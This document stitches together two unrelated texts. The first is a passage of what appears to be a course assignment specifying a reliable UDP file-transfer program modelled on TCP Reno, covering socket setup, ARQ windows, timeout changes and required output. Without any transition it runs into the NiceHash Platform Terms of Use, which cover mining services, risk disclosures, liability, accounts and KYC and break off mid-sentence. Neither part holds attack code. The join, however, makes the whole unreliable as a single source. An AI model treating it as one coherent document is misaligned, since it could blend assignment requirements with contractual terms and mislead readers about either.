if the client is running on compserv3 and the server on any of the other three compservs, and if that server node is also being identified to the client by its /28 (rather than its /24) address, then the client will get a “false positive” when it tests as to whether the server node is local or not. In other words, the client will deem the server node to be local, whereas in fact it should not be considered local. Because of this, it is perhaps best simply not to use compserv3 to run the client (but it is o.k. to use it to run the server). Finally, using MSG_DONTROUTE where possible would seem to gain us efficiency, in as much as the kernel does not need to consult the routing table for every datagram sent. But, in fact, that is not so. Recall that one effect of connect with UDP sockets is that routing information is obtained by the kernel at the time the connect is issued. That information is cached and used for subsequent sends from the connected socket (see p.255). The client now creates a UDP socket and calls bind on IPclient, with 0 as the port number. This will cause the kernel to bind an ephemeral port to the socket. After the bind, use the getsockname function (Section 4.10) to obtain IPclient and the ephemeral port number that has been assigned to the socket, and print that information out on stdout, with an appropriate message and appropriately formatted. The client connects its socket to IPserver and the well-known port number of the server. After the connect, use the getpeername function (Section 4.10) to obtain IPserver and the well-known port number of the server, and print that information out on stdout, with an appropriate message and appropriately formatted. The client sends a datagram to the server giving the filename for the transfer. This send needs to be backed up by a timeout in case the datagram is lost. Note that the incoming datagram from the client will be delivered to the server at the socket to which the destination IP address that the datagram is carrying has been bound. Thus, the server can obtain that address (it is, of course, IPserver) and thereby achieve what IP_RECVDESTADDR would have given us had it been available. Furthermore, the server process can obtain the IP address (this will, of course, be IPclient) and ephemeral port number of the client through the recvfrom or recvmsg functions. The server forks off a child process to handle the client. The server parent process goes back to the select to listen for new clients. Hereafter, and unless otherwise stated, whenever we refer to the ‘server’, we mean the server child process handling the client’s file transfer, not the server parent process. Typically, the first thing the server child would be expected to do is to close all sockets it ‘inherits’ from its parent. However, this is not the case with us. The server child does indeed close the sockets it inherited, but not the socket on which the client request arrived. It leaves that socket open for now. Call this socket the ‘listening’ socket. The server (child) then checks if the client host is local to its (extended) Ethernet. If so, all its communication to the client is to occur as MSG_DONTROUTE (or SO_DONTROUTE socket option). If IPserver (obtained in 5. above) is the loopback address, then we are done. Otherwise, the server has to proceed with the following step. Use the array of structures you built in 1. above, together with the addresses IPserver and IPclient to determine if the client is ‘local’. Print out on stdout the results of your examination, as to whether the client host is ‘local’ or not. The server (child) creates a UDP socket to handle file transfer to the client. Call this socket the ‘connection’ socket. It binds the socket to IPserver, with port number 0 so that its kernel assigns an ephemeral port. After the bind, use the getsockname function (Section 4.10) to obtain IPserver and the ephemeral port number that has been assigned to the socket, and print that information out on stdout, with an appropriate message and appropriately formatted. The server then connects this ‘connection’ socket to the client’s IPclient and ephemeral port number. The server now sends the client a datagram, in which it passes it the ephemeral port number of its ‘connection’ socket as the data payload of the datagram. This datagram is sent using the ‘listening’ socket inherited from its parent, otherwise the client (whose socket is connected to the server’s ‘listening’ socket at the latter’s well-known port number) will reject it. This datagram must be backed up by the ARQ mechanism, and retransmitted in the event of loss. Note that if this datagram is indeed lost, the client might well time out and retransmit its original request message (the one carrying the file name). In this event, you must somehow ensure that the parent server does not mistake this retransmitted request for a new client coming in, and spawn off yet another child to handle it. How do you do that? It is potentially more involved than it might seem. I will be discussing this in class, as well as ‘race’ conditions that could potentially arise, depending on how you code the mechanisms I present. When the client receives the datagram carrying the ephemeral port number of the server’s ‘connection’ socket, it reconnects its socket to the server’s ‘connection’ socket, using IPserver and the ephemeral port number received in the datagram (see p.254). It now uses this reconnected socket to send the server an acknowledgment. Note that this implies that, in the event of the server timing out, it should retransmit two copies of its ‘ephemeral port number’ message, one on its ‘listening’ socket and the other on its ‘connection’ socket (why?). When the server receives the acknowledgment, it closes the ‘listening’ socket it inherited from its parent. The server can now commence the file transfer through its ‘connection’ socket. The net effect of all these binds and connects at server and client is that no ‘outsider’ UDP datagram (broadcast, multicast, unicast - fortuitously or maliciously) can now intrude on the communication between server and client. Starting with the first datagram sent out, the client behaves as follows. Whenever a datagram arrives, or an ACK is about to be sent out (or, indeed, the initial datagram to the server giving the filename for the transfer), the client uses some random number generator function random() (initialized by the client.in argument value seed) to decide with probability p (another client.in argument value) if the datagram or ACK should be discarded by way of simulating transmission loss across the network. (I will briefly discuss in class how you do this.) Adding reliability to UDP The mechanisms you are to implement are based on TCP Reno. These include : Reliable data transmission using ARQ sliding-windows, with Fast Retransmit. Flow control via receiver window advertisements. Congestion control that implements : SlowStart Congestion Avoidance (‘Additive-Increase/Multiplicative Decrease’ – AIMD) Fast Recovery (but without the window-inflation aspect of Fast Recovery) Only some, and by no means all, of the details for these are covered below. The rest will be presented in class, especially those concerning flow control and TCP Reno’s congestion control mechanisms in general : Slow Start, Congestion Avoidance, Fast Retransmit and Fast Recovery. Implement a timeout mechanism on the sender (server) side. This is available to you from Stevens, Section 22.5 . Note, however, that you will need to modify the basic driving mechanism of Figure 22.7 appropriately since the situation at the sender side is not a repetitive cycle of send-receive, but rather a straightforward progression of send-send-send-send- . . . . . . . . . . . Also, modify the RTT and RTO mechanisms of Section 22.5 as specified below. I will be discussing the details of these modifications and the reasons for them in class. Modify function rtt_stop (Fig. 22.13) so that it uses integer arithmetic rather than floating point. This will entail your also having to modify some of the variable and function parameter declarations throughout Section 22.5 from float to int, as appropriate. In the unprrt.h header file (Fig. 22.10) set : RTT_RXTMIN to 1000 msec. (1 sec. instead of the current value 3 sec.) RTT_RXTMAX to 3000 msec. (3 sec. instead of the current value 60 sec.) RTT_MAXNREXMT to 12 (instead of the current value 3) In function rtt_timeout (Fig. 22.14), after doubling the RTO in line 86, pass its value through the function rtt_minmax of Fig. 22.11 (somewhat along the lines of what is done in line 77 of rtt_stop, Fig. 22.13). Finally, note that with the modification to integer calculation of the smoothed RTT and its variation, and given the small RTT values you will experience on the cs / sbpub network, these calculations should probably now be done on a millisecond or even microsecond scale (rather than in seconds, as is the case with Stevens’ code). Otherwise, small measured RTTs could show up as 0 on a scale of seconds, yielding a negative result when we subtract the smoothed RTT from the measured RTT (line 72 of rtt_stop, Fig. 22.13). Report the details of your modifications to the code of Section 22.5 in the ReadMe file which you hand in with your code. We need to have a sender sliding window mechanism for the retransmission of lost datagrams; and a receiver sliding window in order to ensure correct sequencing of received file contents, and some measure of flow control. You should implement something based on TCP Reno’s mechanisms, with cumulative acknowledgments, receiver window advertisements, and a congestion control mechanism I will explain in detail in class. For a reference on TCP’s mechanisms generally, see W. Richard Stevens, TCP/IP Illustrated, Volume 1 , especially Sections 20.2 - 20.4 of Chapter 20 , and Sections 21.1 - 21.8 of Chapter 21 . Bear in mind that our sequence numbers should count datagrams, not bytes as in TCP. Remember that the sender and receiver window sizes have to be set according to the argument values in client.in and server.in, respectively. Whenever the sender window becomes full and so ‘locks’, the server should print out a message to that effect on stdout. Similarly, whenever the receiver window ‘locks’, the client should print out a message on stdout. Be aware of the potential for deadlock when the receiver window ‘locks’. This situation is handled by having the receiver process send a duplicate ACK which acts as a window update when its window opens again (see Figure 20.3 and the discussion about it in TCP/IP Illustrated). However, this is not enough, because ACKs are not backed up by a timeout mechanism in the event they are lost. So we will also need to implement a persist timer driving window probes in the sender process (see Sections 22.1 & 22.2 in Chapter 22 of TCP/IP Illustrated). Note that you do not have to worry about the Silly Window Syndrome discussed in Section 22.3 of TCP/IP Illustrated since the receiver process consumes ‘full sized’ 512-byte messages from the receiver buffer (see 3. below). Report on the details of the ARQ mechanism you implemented in the ReadMe file you hand in. Indeed, you should report on all the TCP mechanisms you implemented in the ReadMe file, both the ones discussed here, and the ones I will be discussing in class. Make your datagram payload a fixed 512 bytes, inclusive of the file transfer protocol header (which must, at the very least, carry: the sequence number of the datagram; ACKs; and advertised window notifications). The client reads the file contents in its receive buffer and prints them out on stdout using a separate thread. This thread sits in a repetitive loop till all the file contents have been printed out, doing the following. It samples from an exponential distribution with mean µ milliseconds (read from the client.in file), sleeps for that number of milliseconds; wakes up to read and print all in-order file contents available in the receive buffer at that point; samples again from the exponential distribution; sleeps; and so on. The formula -1 × µ × ln( random( ) ) , where ln is the natural logarithm, yields variates from an exponential distribution with mean µ, based on the uniformly-distributed variates over ( 0 , 1 ) returned by random(). Note that you will need to implement some sort of mutual exclusion/semaphore mechanism on the client side so that the thread that sleeps and wakes up to consume from the receive buffer is not updating the state variables of the buffer at the same time as the main thread reading from the socket and depositing into the buffer is doing the same. Furthermore, we need to ensure that the main thread does not effectively monopolize the semaphore (and thus lock out for prolonged periods of time) the sleeping thread when the latter wakes up. See the textbook, Section 26.7, ‘Mutexes: Mutual Exclusion’, pp.697-701. You might also find Section 26.8, ‘Condition Variables’, pp.701-705, useful. You will need to devise some way by which the sender can notify the receiver when it has sent the last datagram of the file transfer, without the receiver mistaking that EOF marker as part of the file contents. (Also, note that the last data segment could be a “short” segment of less than 512 bytes – your client needs to be able to handle this correctly somehow.) When the sender receives an ACK for the last datagram of the transfer, the (child) server terminates. The parent server has to take care of cleaning up zombie children. Note that if we want a clean closing, the client process cannot simply terminate when the receiver ACKs the last datagram. This ACK could be lost, which would leave the (child) server process ‘hanging’, timing out, and retransmitting the last datagram. TCP attempts to deal with this problem by means of the TIME_WAIT state. You should have your receiver process behave similarly, sticking around in something akin to a TIME_WAIT state in case in case it needs to retransmit the ACK. In the ReadMe file you hand in, report on how you dealt with the issues raised here: sender notifying receiver of the last datagram, clean closing, and so on. Output Some of the output required from your program has been described in the section Operation above. I expect you to provide further output – clear, well-structured, well-laid-out, concise but sufficient and helpful – in the client and server windows by means of which we can trace the correct evolution of your TCP’s behaviour in all its intricacies : information (e.g., sequence number) on datagrams and acks sent and dropped, window advertisements, datagram retransmissions (and why : dup acks or RTO); entering/exiting Slow Start and Congestion Avoidance, ssthresh and cwnd values; sender and receiver windows locking/unlocking; etc., etc. . . . . The onus is on you to convince us that the TCP mechanisms you implemented are working correctly. Too many students do not put sufficient thought, creative imagination, time or effort into this. It is not the TA’s nor my responsibility to sit staring at an essentially blank screen, trying to summon up our paranormal psychology skills to figure out if your TCP implementation is really working correctly in all its very intricate aspects, simply because the transferred file seems to be printing o.k. in the client window. Nor is it our responsibility to strain our eyes and our patience wading through a mountain of obscure, ill-structured, hyper-messy, debugging-style output because, for example, your effort-conserving concept of what is ‘suitable’ is to dump your debugging output on us, relevant, irrelevant, and everything in between.
Rastaman4e / 1NICEHASH PLATFORM TERMS OF USE AND NICEHASH MINING TERMS OF SERVICE PLEASE READ THESE NICEHASH PLATFORM TERMS OF USE AND NICEHASH MINING TERMS OF SERVICE (“Terms”) CAREFULLY BEFORE USING THE THE PLATFORM OR SERVICES DESCRIBED HEREIN. BY SELECTING “I AGREE”, ACCESSING THE PLATFORM, USING NICEHASH MINING SERVICES OR DOWNLOADING OR USING NICEHASH MINING SOFTWARE, YOU ARE ACKNOWLEDGING THAT YOU HAVE READ THESE TERMS, AS AMENDED FROM TIME TO TIME, AND YOU ARE AGREEING TO BE BOUND BY THEM. IF YOU DO NOT AGREE TO THESE TERMS, OR ANY SUBSEQUENT AMENDMENTS, CHANGES OR UPDATES, DO NOT ACCESS THE PLATFORM, USE NICEHASH MINING SERVICES OR USE THE NICEHASH MINING SOFTWARE. GENERAL These Terms apply to users of the NiceHash Platform (“Platform” and NiceHash Mining Services (“Services”) which are provided to you by NICEHASH Ltd, company organized and existing under the laws of the British Virgin Islands, with registered address at Intershore Chambers, Road Town, Tortola, British Virgin Islands, registration number: 2048669, hereinafter referred to as “NiceHash, as well as “we” or “us”. ELIGIBILITY By using the NiceHash platform and NiceHash Mining Services, you represent and warrant that you: are at least Minimum Age and have capacity to form a binding contract; have not previously been suspended or removed from the NiceHash Platform; have full power and authority to enter into this agreement and in doing so will not violate any other agreement to which you are a party; are not not furthering, performing, undertaking, engaging in, aiding, or abetting any unlawful activity through your relationship with us, through your use of NiceHash Platform or use of NiceHash Mining Services; will not use NiceHash Platform or NiceHash Mining Services if any applicable laws in your country prohibit you from doing so in accordance with these Terms. We reserve the right to terminate your access to the NiceHash Platform and Mining Services for any reason and in our sole and absolute discretion. Use of NiceHash Platform and Mining Services is void where prohibited by applicable law. Depending on your country of residence or incorporation or registered office, you may not be able to use all the functions of the NiceHash Platform or services provided therein. It is your responsibility to follow the rules and laws in your country of residence and/or country from which you access the NiceHash Platform. DEFINITIONS NiceHash Platform means a website located on the following web address: www.nicehash.com. NiceHash Mining Services mean all services provided by NiceHash, namely the provision of the NiceHash Platform, NiceHash Hashing power marketplace, NiceHash API, NiceHash OS, NiceHash Mining Software including licence for NiceHash Miner, NiceHash Private Endpoint, NiceHash Account, NiceHash mobile apps, and all other software products, applications and services associated with these products, except for the provision of NiceHash Exchange Services. NiceHash Exchange Service means a service which allows trading of digital assets in the form of digital tokens or cryptographic currency for our users by offering them a trading venue, helping them find a trading counterparty and providing the means for transaction execution. NiceHash Exchange Services are provided by NICEX Ltd and accessible at the NiceHash Platform under NiceHash Exchange Terms of Service. Hashing power marketplace means an infrastructure provided by the NiceHash which enables the Hashing power providers to point their rigs towards NiceHash stratum servers where Hashing power provided by different Hashing power providers is gathered and sold as generic Hashing power to the Hashing power buyers. Hashing power buyer means a legal entity or individual who buys the gathered and generic hashing power on the Hashing power marketplace from undefined Hashing power providers. Hashing power provider means a legal entity or individual who sells his hashing power on the Hashing power marketplace to undefined Hashing power buyers. NiceHash Mining Software means NiceHash Miner and any other software available via the NiceHash Platform. NiceHash Miner means a comprehensive software with graphical user interface and web interface, owned by NiceHash. NiceHash Miner is a process manager software which enables the Hashing power providers to point their rigs towards NiceHash stratum servers and sell their hashing power to the Hashing power buyers. NiceHash Miner also means any and all of its code, compilations, updates, upgrades, modifications, error corrections, patches and bug fixes and similar. NiceHash Miner does not mean third party software compatible with NiceHash Miner (Third Party Plugins and Miners). NiceHash QuickMiner means a software accessible at https://www.nicehash.com/quick-miner which enables Hashing power providers to point their PCs or rigs towards NiceHash stratum servers and sell their hashing power to the Hashing power buyers. NiceHash QuickMiner is intended as a tryout tool. Hashing power rig means all hardware which produces hashing power that represents computation power which is required to calculate the hash function of different type of cryptocurrency. Secondary account is an account managed by third party from which the Account holder deposits funds to his NiceHash Wallet or/and to which the Account holder withdraws funds from his NiceHash Wallet. Stratum is a lightweight mining protocol: https://slushpool.com/help/manual/stratum-protocol. NiceHash Account means an online account available on the NiceHash Platform and created by completing the registration procedure on the NiceHash Platform. Account holder means an individual or legal entity who completes the registration procedure and successfully creates the NiceHash Account. Minimum Age means 18 years old or older, if in order for NiceHash to lawfully provide the Services to you without parental consent (including using your personal data). NiceHash Wallet means a wallet created automatically for the Account holder and provided by the NiceHash Wallet provider. NiceHash does not hold funds on behalf of the Account holder but only transfers Account holder’s requests regarding the NiceHash Wallet transaction to the NiceHash Wallet provider who executes the requested transactions. In this respect NiceHash only processes and performs administrative services related to the payments regarding the NiceHash Mining Services and NiceHash Exchange Services, if applicable. NiceHash Wallet provider is a third party which on the behalf of the Account holder provides and manages the NiceHash Wallet, holds, stores and transfers funds and hosts NiceHash Wallet. For more information about the NiceHash Wallet provider, see the following website: https://www.bitgo.com/. Blockchain network is a distributed database that is used to maintain a continuously growing list of records, called blocks. Force Majeure Event means any governmental or relevant regulatory regulations, acts of God, war, riot, civil commotion, fire, flood, or any disaster or an industrial dispute of workers unrelated to you or NiceHash. Any act, event, omission, happening or non-happening will only be considered Force Majeure if it is not attributable to the wilful act, neglect or failure to take reasonable precautions of the affected party, its agents, employees, consultants, contractors and sub-contractors. SALE AND PURCHASE OF HASHING POWER Hashing power providers agree to sell and NiceHash agrees to proceed Hashing power buyers’ payments for the provided hashing power on the Hashing power marketplace, on the Terms set forth herein. According to the applicable principle get-paid-per-valid-share (pay as you go principle) Hashing power providers will be paid only for validated and accepted hashing power to their NiceHash Wallet or other wallet, as indicated in Account holder’s profile settings or in stratum connection username. In some cases, no Hashing power is sent to Hashing power buyers or is accepted by NiceHash Services, even if Hashing power is generated on the Hashing power rigs. These cases include usage of slower hardware as well as software, hardware or network errors. In these cases, Hashing power providers are not paid for such Hashing power. Hashing power buyers agree to purchase and NiceHash agrees to process the order and forward the purchased hashing power on the Hashing power marketplace, on the Terms set forth herein. According to the applicable principle pay-per-valid-share (pay as you go principle) Hashing power buyers will pay from their NiceHash Wallet only for the hashing power that was validated by our engine. When connection to the mining pool which is selected on the Hashing power order is lost or when an order is cancelled during its lifetime, Hashing power buyer pays for additional 10 seconds worth of hashing power. Hashing power order is charged for extra hashing power when mining pool which is selected on the Hashing power order, generates rapid mining work changes and/or rapid mining job switching. All payments including any fees will be processed in crypto currency and NiceHash does not provide an option to sale and purchase of the hashing power in fiat currency. RISK DISCLOSURE If you choose to use NiceHash Platform, Services and NiceHash Wallet, it is important that you remain aware of the risks involved, that you have adequate technical resources and knowledge to bear such risks and that you monitor your transactions carefully. General risk You understand that NiceHash Platform and Services, blockchain technology, Bitcoin, all other cryptocurrencies and cryptotokens, proof of work concept and other associated and related technologies are new and untested and outside of NiceHash’s control. You acknowledge that there are major risks associated with these technologies. In addition to the risks disclosed below, there are risks that NiceHash cannot foresee and it is unreasonable to believe that such risk could have been foreseeable. The performance of NiceHash’s obligation under these Terms will terminate if market or technology circumstances change to such an extent that (i) these Terms clearly no longer comply with NiceHash’s expectations, (ii) it would be unjust to enforce NiceHash’s obligations in the general opinion or (iii) NiceHash’s obligation becomes impossible. NiceHash Account abuse You acknowledge that there is risk associated with the NiceHash Account abuse and that you have been fully informed and warned about it. The funds stored in the NiceHash Wallet may be disposed by third party in case the third party obtains the Account holder’s login credentials. The Account holder shall protect his login credentials and his electronic devices where the login credentials are stored against unauthorized access. Regulatory risks You acknowledge that there is risk associated with future legislation which may restrict, limit or prohibit certain aspects of blockchain technology which may also result in restriction, limitation or prohibition of NiceHash Services and that you have been fully informed and warned about it. Risk of hacking You acknowledge that there is risk associated with hacking NiceHash Services and NiceHash Wallet and that you have been fully informed and warned about it. Hacker or other groups or organizations may attempt to interfere with NiceHash Services or NiceHash Wallet in any way, including without limitation denial of services attacks, Sybil attacks, spoofing, smurfing, malware attacks, mining attacks or consensus-based attacks. Cryptocurrency risk You acknowledge that there is risk associated with the cryptocurrencies which are used as payment method and that you have been fully informed and warned about it. Cryptocurrencies are prone to, but not limited to, value volatility, transaction costs and times uncertainty, lack of liquidity, availability, regulatory restrictions, policy changes and security risks. NiceHash Wallet risk You acknowledge that there is risk associated with funds held on the NiceHash Wallet and that you have been fully informed and warned about it. You acknowledge that NiceHash Wallet is provided by NiceHash Wallet provider and not NiceHash. You acknowledge and agree that NiceHash shall not be responsible for any NiceHash Wallet provider’s services, including their accuracy, completeness, timeliness, validity, copyright compliance, legality, decency, quality or any other aspect thereof. NiceHash does not assume and shall not have any liability or responsibility to you or any other person or entity for any Hash Wallet provider’s services. Hash Wallet provider’s services and links thereto are provided solely as a convenience to you and you access and use them entirely at your own risk and subject to NiceHash Wallet provider’s terms and conditions. Since the NiceHash Wallet is a cryptocurrency wallet all funds held on it are entirely uninsured in contrast to the funds held on the bank account or other financial institutions which are insured. Connection risk You acknowledge that there are risks associated with usage of NiceHash Services which are provided through the internet including, but not limited to, the failure of hardware, software, configuration and internet connections and that you have been fully informed and warned about it. You acknowledge that NiceHash will not be responsible for any configuration, connection or communication failures, disruptions, errors, distortions or delays you may experience when using NiceHash Services, however caused. Hashing power provision risk You acknowledge that there are risks associated with the provisions of the hashing power which is provided by the Hashing power providers through the Hashing power marketplace and that you have been fully informed and warned about it. You acknowledge that NiceHash does not provide the hashing power but only provides the Hashing power marketplace as a service. Hashing power providers’ Hashing power rigs are new and untested and outside of NiceHash’s control. There is a major risk that the Hashing power rigs (i) will stop providing hashing power, (ii) will provide hashing power in an unstable way, (iii) will be wrongly configured or (iv) provide insufficient speed of the hashing power. Hashing power rigs as hardware could be subject of damage, errors, electricity outage, misconfiguration, connection or communication failures and other malfunctions. NiceHash will not be responsible for operation of Hashing power rigs and its provision of hashing power. By submitting a Hashing power order you agree to Hashing power no-refund policy – all shares forwarded to mining pool, selected on the Hashing power order are final and non-refundable. Hashing power profitability risk You acknowledge that there is risk associated with the profitability of the hashing power provision and that you have been fully informed and warned about it. You acknowledge that all Hashing power rig’s earning estimates and profitability calculations on NiceHash Platform are only for informational purposes and were made based on the Hashing power rigs set up in the test environments. NiceHash does not warrant that your Hashing power rigs would achieve the same profitability or earnings as calculated on NiceHash Platform. There is risk that your Hashing power rig would not produce desired hashing power quantity and quality and that your produced hashing power would differentiate from the hashing power produced by our Hashing power rigs set up in the test environments. There is risk that your Hashing power rigs would not be as profitable as our Hashing power rigs set up in the test environments or would not be profitable at all. WARRANTIES NiceHash Platform and Mining Services are provided on the “AS IS” and “AS AVAILABLE” basis, including all faults and defects. To the maximum extent permitted by applicable law, NiceHash makes no representations and warranties and you waive all warranties of any kind. Particularly, without limiting the generality of the foregoing, the NiceHash makes no representations and warranties, whether express, implied, statutory or otherwise regarding NiceHash Platform and Mining Services or other services related to NiceHash Platform and provided by third parties, including any warranty that such services will be uninterrupted, harmless, secure or not corrupt or damaged, meet your requirements, achieve any intended results, be compatible or work with any other software, applications, systems or services, meet any performance or error free or that any errors or defects can or will be corrected. Additionally NiceHash makes no representations and warranties, whether express, implied, statutory or otherwise of merchantability, suitability, reliability, availability, timeliness, accuracy, satisfactory quality, fitness for a particular purpose or quality, title and non-infringement with respect to any of the Mining Services or other services related to NiceHash Platform and provided by third parties, or quiet enjoyment and any warranties arising out of any course of dealing, course of performance, trade practice or usage of NiceHash Platform and Mining Services including information, content and material contained therein. Especially NiceHash makes no representations and warranties, whether express, implied, statutory or otherwise regarding any payment services and systems, NiceHash Wallet which is provided by third party or any other financial services which might be related to the NiceHash Platform and Mining Services. You acknowledge that you do not rely on and have not been induced to accept the NiceHash Platform and Mining Services according to these Terms on the basis of any warranties, representations, covenants, undertakings or any other statement whatsoever, other than expressly set out in these Terms that neither the NiceHash nor any of its respective agents, officers, employees or advisers have given any such warranties, representations, covenants, undertakings or other statements. LIABILITY NiceHash and their respective officers, employees or agents will not be liable to you or anyone else, to the maximum extent permitted by applicable law, for any damages of any kind, including, but not limited to, direct, consequential, incidental, special or indirect damages (including but not limited to lost profits, trading losses or damages that result from use or loss of use of NiceHash Services or NiceHash Wallet), even if NiceHash has been advised of the possibility of such damages or losses, including, without limitation, from the use or attempted use of NiceHash Platform and Mining Services, NiceHash Wallet or other related websites or services. NiceHash does not assume any obligations to users in connection with the unlawful alienation of Bitcoins, which occurred on 6. 12. 2017 with NICEHASH, d. o. o., and has been fully reimbursed with the completion of the NiceHash Repayment Program. NiceHash will not be responsible for any compensation, reimbursement, or damages arising in connection with: (i) your inability to use the NiceHash Platform and Mining Services, including without limitation as a result of any termination or suspension of the NiceHash Platform or these Terms, power outages, maintenance, defects, system failures, mistakes, omissions, errors, defects, viruses, delays in operation or transmission or any failure of performance, (ii) the cost of procurement of substitute goods or services, (iii) any your investments, expenditures, or commitments in connection with these Terms or your use of or access to the NiceHash Platform and Mining Services, (iv) your reliance on any information obtained from NiceHash, (v) Force Majeure Event, communications failure, theft or other interruptions or (vi) any unauthorized access, alteration, deletion, destruction, damage, loss or failure to store any data, including records, private key or other credentials, associated with NiceHash Platform and Mining Services or NiceHash Wallet. Our aggregate liability (including our directors, members, employees and agents), whether in contract, warranty, tort (including negligence, whether active, passive or imputed), product liability, strict liability or other theory, arising out of or relating to the use of NiceHash Platform and Mining Services, or inability to use the Platform and Services under these Terms or under any other document or agreement executed and delivered in connection herewith or contemplated hereby, shall in any event not exceed 100 EUR per user. You will defend, indemnify, and hold NiceHash harmless and all respective employees, officers, directors, and representatives from and against any claims, demand, action, damages, loss, liabilities, costs and expenses (including reasonable attorney fees) arising out of or relating to (i) any third-party claim concerning these Terms, (ii) your use of, or conduct in connection with, NiceHash Platform and Mining Services, (iii) any feedback you provide, (iv) your violation of these Terms, (v) or your violation of any rights of any other person or entity. If you are obligated to indemnify us, we will have the right, in our sole discretion, to control any action or proceeding (at our expense) and determine whether we wish to settle it. If we are obligated to respond to a third-party subpoena or other compulsory legal order or process described above, you will also reimburse us for reasonable attorney fees, as well as our employees’ and contractors’ time and materials spent responding to the third-party subpoena or other compulsory legal order or process at reasonable hourly rates. The Services and the information, products, and services included in or available through the NiceHash Platform may include inaccuracies or typographical errors. Changes are periodically added to the information herein. Improvements or changes on the NiceHash Platform can be made at any time. NICEHASH ACCOUNT The registration of the NiceHash Account is made through the NiceHash Platform, where you are required to enter your email address and password in the registration form. After successful completion of registration, the confirmation email is sent to you. After you confirm your registration by clicking on the link in the confirmation email the NiceHash Account is created. NiceHash will send you proof of completed registration once the process is completed. When you create NiceHash Account, you agree to (i) create a strong password that you change frequently and do not use for any other website, (ii) implement reasonable and appropriate measures designed to secure access to any device which has access to your email address associated with your NiceHash Account and your username and password for your NiceHash Account, (iii) maintain the security of your NiceHash Account by protecting your password and by restricting access to your NiceHash Account; (iv) promptly notify us if you discover or otherwise suspect any security breaches related to your NiceHash Account so we can take all required and possible measures to secure your NiceHash Account and (v) take responsibility for all activities that occur under your NiceHash Account and accept all risks of any authorized or unauthorized access to your NiceHash Account, to the maximum extent permitted by law. Losing access to your email, registered at NiceHash Platform, may also mean losing access to your NiceHash Account. You may not be able to use the NiceHash Platform or Mining Services, execute withdrawals and other security sensitive operations until you regain access to your email address, registered at NiceHash Platform. If you wish to change the email address linked to your NiceHash Account, we may ask you to complete a KYC procedure for security purposes. This step serves solely for the purpose of identification in the process of regaining access to your NiceHash Account. Once the NiceHash Account is created a NiceHash Wallet is automatically created for the NiceHash Account when the request for the first deposit to the NiceHash Wallet is made by the user. Account holder’s NiceHash Wallet is generated by NiceHash Wallet provider. Account holder is strongly suggested to enhance the security of his NiceHash Account by adding an additional security step of Two-factor authentication (hereinafter “2FA”) when logging into his account, withdrawing funds from his NiceHash Wallet or placing a new order. Account holder can enable this security feature in the settings of his NiceHash Account. In the event of losing or changing 2FA code, we may ask the Account holder to complete a KYC procedure for security reasons. This step serves solely for the purpose of identification in the process of reactivating Account holders 2FA and it may be subject to an a In order to use certain functionalities of the NiceHash Platform, such as paying for the acquired hashing power, users must deposit funds to the NiceHash Wallet, as the payments for the hashing power could be made only through NiceHash Wallet. Hashing power providers have two options to get paid for the provided hashing power: (i) by using NiceHash Wallet to receive the payments or (ii) by providing other Bitcoin address where the payments shall be received to. Hashing power providers provide their Bitcoin address to NiceHash by providing such details via Account holder’s profile settings or in a form of a stratum username while connecting to NiceHash stratum servers. Account holder may load funds on his NiceHash Wallet from his Secondary account. Account holder may be charged fees by the Secondary account provider or by the blockchain network for such transaction. NiceHash is not responsible for any fees charged by Secondary account providers or by the blockchain network or for the management and security of the Secondary accounts. Account holder is solely responsible for his use of Secondary accounts and Account holder agrees to comply with all terms and conditions applicable to any Secondary accounts. The timing associated with a load transaction will depend in part upon the performance of Secondary accounts providers, the performance of blockchain network and performance of the NiceHash Wallet provider. NiceHash makes no guarantee regarding the amount of time it may take to load funds on to NiceHash Wallet. NiceHash Wallet shall not be used by Account holders to keep, save and hold funds for longer period and also not for executing other transactions which are not related to the transactions regarding the NiceHash Platform. The NiceHash Wallet shall be used exclusively and only for current and ongoing transactions regarding the NiceHash Platform. Account holders shall promptly withdraw any funds kept on the NiceHash Wallet that will not be used and are not intended for the reasons described earlier. Commission fees may be charged by the NiceHash Wallet provider, by the blockchain network or by NiceHash for any NiceHash Wallet transactions. Please refer to the NiceHash Platform, for more information about the commission fees for NiceHash Wallet transactions which are applicable at the time of the transaction. NiceHash reserves the right to change these commission fees according to the provisions to change these Terms at any time for any reason. You have the right to use the NiceHash Account only in compliance with these Terms and other commercial terms and principles published on the NiceHash Platform. In particular, you must observe all regulations aimed at ensuring the security of funds and financial transactions. Provided that the balance of funds in your NiceHash Wallet is greater than any minimum balance requirements needed to satisfy any of your open orders, you may withdraw from your NiceHash Wallet any amount of funds, up to the total amount of funds in your NiceHash Wallet in excess of such minimum balance requirements, to Secondary Account, less any applicable withdrawal fees charged by NiceHash or by the blockchain network for such transaction. Withdrawals are not processed instantly and may be grouped with other withdrawal requests. Some withdrawals may require additional verification information which you will have to provide in order to process the withdrawal. It may take up to 24 hours before withdrawal is fully processed and distributed to the Blockchain network. Please refer to the NiceHash Platform for more information about the withdrawal fees and withdrawal processing. NiceHash reserves the right to change these fees according to the provisions to change these Terms at any time for any reason. You have the right to close the NiceHash Account. In case you have funds on your NiceHash Wallet you should withdraw funds from your account prior to requesting NiceHash Account closure. After we receive your NiceHash Account closure request we will deactivate your NiceHash Account. You can read more about closing the NiceHash Account in our Privacy Policy. Your NiceHash Account may be deactivated due to your inactivity. Your NiceHash account may be locked and a mandatory KYC procedure is applied for security reasons, if it has been more than 6 month since your last login. NiceHash or any of its partners or affiliates are not responsible for the loss of the funds, stored on or transferred from the NiceHash Wallet, as well as for the erroneous implementation of the transactions made via NiceHash Wallet, where such loss or faulty implementation of the transaction are the result of a malfunction of the NiceHash Wallet and the malfunction was caused by you or the NiceHash Wallet provider. You are obliged to inform NiceHash in case of loss or theft, as well as in the case of any possible misuse of the access data to your NiceHash Account, without any delay, and demand change of access data or closure of your existing NiceHash Account and submit a request for new access data. NiceHash will execute the change of access data or closure of the NiceHash Account and the opening of new NiceHash Account as soon as technically possible and without any undue delay. All information pertaining to registration, including a registration form, generation of NiceHash Wallet and detailed instructions on the use of the NiceHash Account and NiceHash Wallet are available at NiceHash Platform. The registration form as well as the entire system is properly protected from unwanted interference by third parties. KYC PROCEDURE NiceHash is appropriately implementing AML/CTF and security measures to diligently detect and prevent any malicious or unlawful use of NiceHash Services or use, which is strictly prohibited by these Terms, which are deemed as your agreement to provide required personal information for identity verification. Security measures include a KYC procedure, which is aimed at determining the identity of an individual user or an organisation. We may ask you to complete this procedure before enabling some or all functionalities of the NiceHash platform and provide its services. A KYC procedure might be applied as a security measure when: changing the email address linked to your NiceHash Account, losing or changing your 2FA code; logging in to your NiceHash Account for the first time after the launch of the new NiceHash Platform in August 2019, gaining access to all or a 